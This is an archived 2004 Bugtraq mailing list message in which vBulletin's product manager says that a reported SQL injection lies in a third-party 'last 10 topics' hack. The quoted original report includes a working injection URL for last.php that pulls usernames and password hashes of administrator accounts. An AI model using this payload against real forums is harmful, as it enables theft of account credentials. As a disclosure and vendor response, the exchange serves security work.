lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200411121500.iACF04GZ026521@executor.jelsoft.com>
Date: Fri, 12 Nov 2004 15:00:24 -0000
From: "Kier Darby" <kier@...lletin.com>
To: <bugtraq@...urityfocus.com>
Cc: "Mike Sullivan" <mike@...lletin.com>,
	"'Freddie Bingham'" <freddie@...lletin.com>,
	"'Scott MacVicar'" <scott@...lletin.com>
Subject: Vulnerability not with vBulletin


The vulnerability listed here is in a third-party 'hack' script, which is
not part of vBulletin itself, and is beyond the control of the vBulletin
developers.

___________________________
Kier Darby
Product Manager, vBulletin
 
>From: "Dr. Death"
>To: bugtraq@...urityfocus.com
>Subject: SQL injection in vBulletin forums (last10.php)
>Date: Thu, 11 Nov 2004 05:29:44 +0000
>
>hi all,
>
>a new SQL injection found in VBulletin Forums 3.0.x
>
>the Vulnerabilite found in last.php, last 10 topics hack.
>
>
>last.php?fsel=,user.password%20as%20title,user.%20
>%20%20%20username%20as%20lastposter%20FROM%20user,
>thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
>
>to solve the problem delet fsel? from ttlast.php and last10.php
>
>Best Regards,
>Dr.Death
>THE MAN OF THE DARK SIDE
>
>






Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ